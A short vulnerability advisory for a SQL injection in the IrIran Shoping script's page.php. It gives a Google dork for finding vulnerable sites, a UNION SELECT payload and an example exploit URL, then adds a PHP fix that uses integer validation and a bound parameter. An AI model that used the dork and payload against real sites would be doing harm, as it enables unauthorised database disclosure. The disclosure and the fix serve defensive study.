IrIran Shoping is an online e-commerce system. page.php in IrIran Shoping contains a SQL injection vulnerability that may lead to disclosure of sensitive information.

[+]info:
~~~~~~~~~

[~] Title     : IrIran Shoping Script SQL Injection Vulnerability
[~] Author    : Net.Edit0r
[~] Vendor or Software Link  :
[~] Email     : Black.hat.tm@gmail.com
[~] Date      : 2011-03-29
[~] Google dork: "Powered by: IRIran.net"
[~] Category:  [Webapps]
[~] Tested on: [Linux /php]

[+]poc:
~~~~~~~~~

[~] Vulnerable File :
https://www.2cto.com/products/page.php?id=[SQL]
 
[~] ExploiT         :
-10+UnIoN+SeleCt+1,2,3,4,5,6,7,8,9,10,11--
 
[~] Example         :
https://www.2cto.com/products/page.php?id=-10+UnIoN+SeleCt+1,2,3,4,5,6,7,8,9,10,11--
 
[~] Demo            :
?id=-10+UnIoN+SeleCt+1,2,3,4,5,6,7,8,9,10,11--

Fix: filter input.
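
What that filtering could look like for the id parameter of page.php, as an added example that is not taken from the IrIran Shoping code: the value is accepted only as a positive integer and is then passed to the query as a bound parameter. The pages table, its columns, the function names and the sample rows are assumptions made for illustration; PHP 8 with pdo_sqlite is assumed.

```php
<?php
// Added example; not the vendor's code. Table, columns and function names are hypothetical.
declare(strict_types=1);

// Accept the id parameter only if it is a plain positive integer.
function parse_page_id(mixed $raw): ?int
{
    if (!is_string($raw)) {
        return null; // arrays (?id[]=1) and missing values are rejected
    }
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// Look the page up with a bound parameter, so the value never becomes SQL text.
function fetch_page(PDO $db, int $id): ?array
{
    $stmt = $db->prepare('SELECT id, title, body FROM pages WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed sample data in an in-memory SQLite database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT, body TEXT)');
$db->exec("INSERT INTO pages (id, title, body) VALUES (10, 'About', 'About us')");

// Values as PHP would see them in $_GET['id'] after URL decoding ('+' becomes a space).
// The second one is the string from the advisory above.
$samples = ['10', '-10 UnIoN SeleCt 1,2,3,4,5,6,7,8,9,10,11--', '-10', 'abc', '11'];
foreach ($samples as $raw) {
    $id = parse_page_id($raw);
    if ($id === null) {
        // Not an integer in range: answer with HTTP 400 and run no query at all.
        printf("%-46s -> rejected\n", var_export($raw, true));
        continue;
    }
    $page = fetch_page($db, $id);
    printf("%-46s -> %s\n", var_export($raw, true), $page['title'] ?? 'not found');
}
```

Validation alone already stops the string in the advisory; the bound parameter keeps the query safe even if the validation is later loosened or bypassed by another code path.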